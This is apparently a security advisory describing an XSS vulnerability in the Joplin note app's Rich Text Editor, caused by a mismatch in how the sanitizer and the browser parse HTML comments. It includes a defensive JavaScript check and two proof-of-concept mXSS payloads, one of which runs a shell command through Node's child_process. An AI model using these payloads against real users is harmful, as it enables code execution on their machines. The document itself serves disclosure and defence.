Summary
An XSS vulnerability allows arbitrary code execution from the Rich Text Editor.
Details
The vulnerability is caused by differences between how Joplin's HTML sanitizer handles comments and how the browser handles comments. This affects both the Rich Text Editor and the Markdown viewer. However, unlike the Rich Text Editor, the Markdown viewer is cross-origin isolated, which prevents JavaScript from directly accessing functions/variables in the top-level Joplin window.
This issue is not present in Joplin 3.1.24 and may have been introduced in 9b50539.
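As an added illustration (not Joplin's code and not part of the original report): the check below models the kind of parser divergence described above. specCommentEnd follows the WHATWG comment-end rules that browsers apply, naiveCommentEnd is a hypothetical sanitizer rule that only recognizes "-->", and hiddenFromNaive lists markup the browser would parse as elements while the naive rule would leave it inside a comment. The sample string is constructed after "XSS 2" below, with a harmless handler.

```javascript
// Index just past a comment beginning at `start` (input[start..] is "<!--"),
// per the HTML spec: "<!-->" and "<!--->" are abruptly-closed comments;
// otherwise the comment ends at the first "-->" or "--!>" (a parse error,
// but browsers still close the comment there).
function specCommentEnd(input, start) {
  const body = start + 4; // skip "<!--"
  if (input.startsWith('>', body)) return body + 1;   // <!-->
  if (input.startsWith('->', body)) return body + 2;  // <!--->
  for (let i = body; i < input.length; i++) {
    if (input.startsWith('-->', i)) return i + 3;
    if (input.startsWith('--!>', i)) return i + 4;
  }
  return input.length; // unterminated: runs to end of input
}

// Hypothetical simplistic rule: only "-->" closes a comment.
function naiveCommentEnd(input, start) {
  const idx = input.indexOf('-->', start + 4);
  return idx === -1 ? input.length : idx + 3;
}

// Split input into {comment, text} segments using the given end-finder.
function segment(input, commentEnd) {
  const out = [];
  let pos = 0;
  while (pos < input.length) {
    const open = input.indexOf('<!--', pos);
    if (open === -1) { out.push({ comment: false, text: input.slice(pos) }); break; }
    if (open > pos) out.push({ comment: false, text: input.slice(pos, open) });
    const end = commentEnd(input, open);
    out.push({ comment: true, text: input.slice(open, end) });
    pos = end;
  }
  return out;
}

// Non-comment segments under browser rules that the naive rule buries in a
// comment: markup a naive sanitizer would pass through unchecked.
function hiddenFromNaive(input) {
  const naiveComments = segment(input, naiveCommentEnd)
    .filter(s => s.comment).map(s => s.text);
  return segment(input, specCommentEnd)
    .filter(s => !s.comment && naiveComments.some(c => c.includes(s.text)))
    .map(s => s.text);
}

// Constructed sample modelled on "XSS 2" (harmless handler).
const SAMPLE = '<!--a foo=--!><img src=x onerror="alert(2)"><!--<a>">';
```

A sanitizer should be tested this way against any tokenizer it does not share with the browser: whenever hiddenFromNaive() is non-empty, the two disagree on where a comment ends.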
PoC
- Create a note with the following Markdown:
<!-- Based on a sample from https://github.com/SonarSource/mxss-cheatsheet/blob/master/examples.md -->
XSS 1:
<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>
XSS 2:
<!--a foo=--!><img src=x onerror="alert(2);top.require('child_process').exec('ls -la', (err, stdout) => {document.body.innerText = stdout})"><!--<a>">
- Switch to the Rich Text Editor.
- Observe that alert dialogs showing "1" then "2" are shown.
- Observe that the editor contains the output of ls -la.
Impact
This is an XSS vulnerability that impacts users that open untrusted notes in the Rich Text Editor.